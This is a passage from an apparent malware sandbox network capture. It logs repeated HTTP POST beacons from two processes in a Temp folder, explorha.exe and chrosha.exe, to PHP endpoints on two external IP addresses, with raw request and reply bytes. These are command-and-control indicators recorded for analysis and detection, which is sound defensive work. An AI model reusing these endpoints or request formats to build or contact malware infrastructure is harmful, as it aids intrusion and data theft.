778 | 192.168.2.5 | 50626 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:33.290183067 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:33.538821936 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
779 | 192.168.2.5 | 50627 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:33.515484095 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:33.758330107 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
780 | 192.168.2.5 | 50628 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:33.796787977 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:34.051884890 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
781 | 192.168.2.5 | 50629 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:34.006957054 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:34.252691984 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
782 | 192.168.2.5 | 50630 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:34.418869019 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:34.667217970 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
783 | 192.168.2.5 | 50631 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:34.608730078 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:34.847742081 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
784 | 192.168.2.5 | 50632 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:34.914247990 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:35.162914991 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
785 | 192.168.2.5 | 50633 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:35.103662968 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:35.358568907 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
786 | 192.168.2.5 | 50634 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:35.522598982 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:35.767996073 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
787 | 192.168.2.5 | 50635 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:35.714906931 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:35.963450909 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
788 | 192.168.2.5 | 50636 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:36.021290064 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:36.275113106 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
789 | 192.168.2.5 | 50637 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:36.211263895 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:36.461401939 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
790 | 192.168.2.5 | 50638 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:36.644637108 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:36.893424034 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
791 | 192.168.2.5 | 50639 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:36.819397926 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:37.064719915 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
792 | 192.168.2.5 | 50640 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:37.149118900 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:37.402888060 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
793 | 192.168.2.5 | 50641 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:37.321908951 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:37.570317984 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
794 | 192.168.2.5 | 50642 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:37.764167070 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:38.015588045 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
795 | 192.168.2.5 | 50643 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:37.931225061 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:38.179800987 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
796 | 192.168.2.5 | 50644 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:38.268912077 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
